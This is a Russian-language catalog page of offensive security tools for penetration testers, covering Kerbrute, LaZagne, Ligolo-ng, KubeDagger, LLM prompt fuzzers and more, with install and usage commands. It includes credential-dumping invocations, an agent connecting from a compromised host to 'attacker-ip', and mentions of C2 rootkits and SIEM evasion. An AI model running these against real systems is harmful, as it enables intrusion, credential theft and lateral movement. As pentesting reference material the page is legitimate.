Каталог инструментов

473 инструментов

Kerbrute

v1.0.3
Password Attacks

Быстрый инструмент для энумерации пользователей и брутфорса паролей через протокол Kerberos. Работает без создания event-логов на уровне NTLM, что делает его менее заметным для стандартных SIEM-систем. Режимы: • …

# Готовые бинарники # https://github.com/ropnop/kerbrute/releases # Go install go install github.com/ropnop/kerbrute@latest # Из исходников git clone https://github.com/ropnop/kerbrute cd kerbrute && make all

KillerBee

v3.0.0-beta.2
Wireless & RF ★ featured

Фреймворк для атак на ZigBee/IEEE 802.15.4 сети (умный дом, промышленная автоматика, умные счётчики). Сниффинг, воспроизведение пакетов, атаки на шифрование, идентификация устройств. Поддерживает RZUSBSTICK, APIMote, ATUSB.

pip install killerbee # или: git clone https://github.com/riverloopsec/killerbee cd killerbee && sudo python setup.py install # Сканирование ZigBee: zbstumbler # Снифинг 802.15.4: zbdump -w capture.pcap -c 26

KrbRelayUp

Post-Exploitation

Инструмент для локального повышения привилегий в доменных средах Windows при отсутствии обязательной подписи LDAP.

git clone https://github.com/Dec0ne/KrbRelayUp.git # Go-компонент: go build -o KrbRelayUp.exe ./main.go # C#-компонент (KrbRelayUp.Slave): dotnet build KrbRelayUp.Slave/KrbRelayUp.Slave.csproj # Готовые бинарники доступны в GitHub Releases (смешанный Go + C# проект)

KubeDagger

v0.4.0
Cloud & Container Security

eBPF-руткит и C2 для cloud-native атак: container breakouts, обход 17 CNCF security-продуктов, автономное планирование.

make make install_client

Kubesploit

v0.1.3
Cloud & Container Security

Кроссплатформенный C2-сервер и агент пост-эксплуатации на Go поверх HTTP/2, ориентированный на контейнеризированные среды.

make export PATH=$PATH:/usr/local/go/bin go build -o agent cmd/merlinagent/main.go go build -o server cmd/merlinserver/main.go

LASGen

Exploitation

Гибридный фаззер библиотек, сочетающий статический анализ с LLM для генерации качественных входных данных с высоким покрытием функций.

python3 generateSliceCode.py

LLMFuzz

Malware Analysis & Forensics

Rust-фаззер промптов для red-team тестирования LLM-эндпоинтов на инъекции и утечки.

git config --global http.sslBackend gnutls git clone https://github.com/honghaojia/LLM-Fuzz.git cd LLM-Fuzz sudo apt-get update sudo apt-get install -y libleveldb-dev curl pip3 install solc-select solc-select install 0.4.26 solc-select use 0.4.26 # Замените API-ключ LLM в коде перед запуском ./edit_source.sh ./initial.sh ./run.sh

LLMtary

v1.0.9
Exploitation

Автономная ИИ-платформа пентеста с LLM-разведкой, анализом уязвимостей, цепочками атак и автоматическим пост-эксплуатационным перебором

# Установка из готового пакета sudo dpkg -i llmtary_*.deb sudo rpm -i LLMtary-*-RH-Fed-Cent_Alma.x86_64.rpm sudo pacman -U LLMtary-*-x86_64.pkg.tar.zst sudo rpm -i LLMtary-*-opensuse.x86_64.rpm # Сборка из исходников flutter config --enable-linux-desktop git clone https://github.com/chetstriker/LLMtary.git cd LLMtary flutter pub get flutter run -d linux flutter build linux

LaZagne

v2.4.7
Post-Exploitation

Кросс-платформенный инструмент для извлечения сохранённых паролей из десятков приложений: браузеры, почтовые клиенты, SSH-клиенты, мессенджеры, БД, VPN, git и др. Работает на Windows, Linux и macOS. Применяется в пентесте …

# Python: git clone https://github.com/AlessandroZ/LaZagne cd LaZagne pip install -r requirements.txt python laZagne.py all # Windows-бинарь: # https://github.com/AlessandroZ/LaZagne/releases laZagne.exe all laZagne.exe browsers laZagne.exe wifi

LazyOwn

vrelease/0.2.151
Post-Exploitation

Комплексный red-team фреймворк с C2 на базе AI, полиморфными имплантами и встроенными инструментами пост-эксплуатации.

git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn bash install.sh

Ligolo-ng

v0.8.3
Exploitation ★ featured

Продвинутый инструмент для туннелирования и пивотинга в сети с использованием TUN-интерфейса. Позволяет прозрачно направлять трафик через скомпрометированные хосты без socks-proxy. Возможности: - Прозрачный туннель через TUN-интерфейс (не SOCKS) …

# Скачать релизы (proxy + agent): # https://github.com/nicocha30/ligolo-ng/releases # На хосте атакующего (proxy): sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ./proxy -selfcert -laddr 0.0.0.0:11601 # На скомпрометированной машине (agent): ./agent -connect attacker-ip:11601 -ignore-cert # В консоли proxy: session # выбрать агента ifconfig # посмотреть сети агента start # запустить туннель # Добавить маршрут к внутренней сети: sudo ip route add 192.168.1.0/24 dev ligolo

LockKnife

v1.2.0
Hardware & Industrial

TUI-инструмент для глубокого исследования Android-безопасности с ИИ-агентами и анализом APK

git clone https://github.com/ImKKingshuk/LockKnife.git cd LockKnife pip install -r requirements.txt python lockknife.py